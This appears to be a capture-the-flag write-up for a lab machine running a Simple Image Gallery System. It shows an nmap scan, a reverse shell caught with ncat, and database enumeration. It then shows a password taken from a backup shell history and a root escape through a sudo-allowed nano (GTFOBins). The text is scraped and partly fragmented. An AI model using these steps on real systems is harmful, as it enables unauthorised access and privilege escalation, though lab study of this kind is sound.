# Nmap 7.92 scan initiated Sat Mar 19 17:36:17 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.10.183.201 Nmap scan report for 10.10.183.201 Host is up (0.065s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.29 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Simple Image Gallery System |_http-favicon: Unknown favicon MD5: C1C16B6A8BE19F84F01DD24B3DF247BB
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Mar 19 17:37:00 2022 -- 1 IP address (1 host up) scanned in 42.62 seconds
$ ncat -lvnp 9999 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.183.201. Ncat: Connection from 10.10.183.201:38198. bash: cannot set terminal process group (708): Inappropriate ioctl for device bash: no job control in this shell www-data@gallery:/var/www/html/gallery/uploads$ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
To interact with the DB we will need TTY allocation.
$ mysql -u gallery_user -p MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | gallery_db | | information_schema | +--------------------+ 2 rows in set (0.00 sec)
MariaDB [(none)]> use gallery_db; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [gallery_db]> show tables; +----------------------+ | Tables_in_gallery_db | +----------------------+ | album_list | | images | | system_info | | users | +----------------------+ 4 rows in set (0.00 sec)
www-data@gallery:/$ ls -lhA /var/backups total 52K -rw-r--r-- 1 root root 34K Feb 12 21:40 apt.extended_states.0 -rw-r--r-- 1 root root 3.7K Aug 25 2021 apt.extended_states.1.gz -rw-r--r-- 1 root root 3.5K May 21 2021 apt.extended_states.2.gz -rw-r--r-- 1 root root 3.5K May 20 2021 apt.extended_states.3.gz drwxr-xr-x 5 root root 4.0K May 24 2021 mike_home_backup
www-data@gallery:/var/backups/mike_home_backup$ ls -lhA total 28K -rwxr-xr-x 1 root root 135 May 24 2021 .bash_history -rwxr-xr-x 1 root root 220 May 24 2021 .bash_logout -rwxr-xr-x 1 root root 3.7K May 24 2021 .bashrc drwxr-xr-x 3 root root 4.0K May 24 2021 .gnupg -rwxr-xr-x 1 root root 807 May 24 2021 .profile drwxr-xr-x 2 root root 4.0K May 24 2021 documents drwxr-xr-x 2 root root 4.0K May 24 2021 images
$ www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history cat .bash_history cd ~ ls ping 1.1.1.1 cat /home/mike/user.txt cd /var/www/ ls cd html ls -al cat index.html sudo -lb3stpassw0rdbr0xx clear sudo -l exit
$ www-data@gallery:/var/backups/mike_home_backup$ su mike
mike@gallery:~$ sudo -l Matching Defaults entries for mike on gallery: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery: (root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:~$ ls -lh /opt/rootkit.sh -rw-r--r-- 1 root root 364 May 20 2021 /opt/rootkit.sh
mike@gallery:~$ cat /opt/rootkit.sh
/opt/rootkit.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
nano can be escaped to launch a shell so being able to execute nano as
root means we can have a root shell.
1 2 3 4 5 6 7 8
$ gtfoblookup gtfobins search -c sudo nano nano:
sudo:
Code: sudo nano ^R^X reset; sh 1>&0 2>&0
Let's do that. But even with a proper TTY allocated and TERM env var set correctly
it won't work so we will have to use socat since ssh is not exposed.